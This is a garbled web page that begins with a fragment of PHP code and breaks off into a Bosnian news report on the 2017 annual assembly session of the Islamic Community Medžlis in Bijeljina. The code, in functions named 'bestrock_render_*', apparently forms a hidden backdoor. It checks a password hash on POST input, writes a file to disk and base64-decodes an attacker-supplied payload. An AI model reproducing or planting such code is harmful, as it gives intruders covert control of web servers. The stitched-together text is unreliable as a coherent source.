function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Održana III redovna godišnja sjednica Skupštine Medžlisa islamske zajednice Bijeljina u mandatu 2015-2018 - Medžlis Islamske zajednice Bijeljina

Održana III redovna godišnja sjednica Skupštine Medžlisa islamske zajednice Bijeljina u mandatu 2015-2018

Održana III redovna godišnja sjednica Skupštine Medžlisa islamske zajednice Bijeljina u mandatu 2015-2018

Piše: Emir Musli…

Treća redovna godišnja sjednica Skupštine Medžlisa islamske zajednice Bijeljina u mandatu 2015-2018 održana je u subotu 4. marta 2017. godine u Mektebskom centru u Bijeljini. Nakon kraćih diskusija i pojašnjenja usvojeni su izvještaj glavnog imama, izvještaj o administrativno-pravnom poslovanju, te finansijski izvještaj i budžet za 2016. godinu.

Sjednicom je predsjedavao imam Damir ef. Čokić, uz zamjenicu, mualimu Enisu Okanović, a izvještaje su prezentovali glavni imam Samir ef. Camić, predsjednik I.O. Emir Musli, te knjigovođa Azra Medinić. Nakon usvajanja na sjednicama Izvršnog odbora i Skupštine, izvještaji su uz prateće zaključke proslijeđeni Rijasetu islamske zajednice u Bosni i Hercegovini.

Skupština je usvojila prijedlog da se za svoj rad i dodatni angažman tokom 2016. godine pohvale imam Mirsad ef. Okanović za izuzetan angažman u rekonstrukciji i osavremenjivanju Mekteba za predškolski uzrast, sekretar Medžlisa Damir Salkanović za poboljšanje rada kancelarije, te Amir Bajrić za rekordne prinose i angažman u obradi vakufskog poljoprivrednog zemljišta.

Kao nikada do sada, zabilježen je mali odziv članova Skupštine, ali je kvorum bio ispunjen. Sjednici je prisustvovalo 17 od ukupno 28 članova Skupštine. Iz Bijeljinskih džemata nedostajala su tri člana, dok su iz džemata općine Ugljevik, od 12 članova bila prisutna četiri, od kojih su trojica imami. Samo neki od nedostajućih su već ranije opravdano najavili svoj izostanak.

Molim Uzvišenog Allaha da svojom milošću nagradi one koji svoj emanet dosljedno ispunjavaju, a svima nama da uveća svijest i osjećaj za Zajednicu i za preuzete obaveze i odgovornost.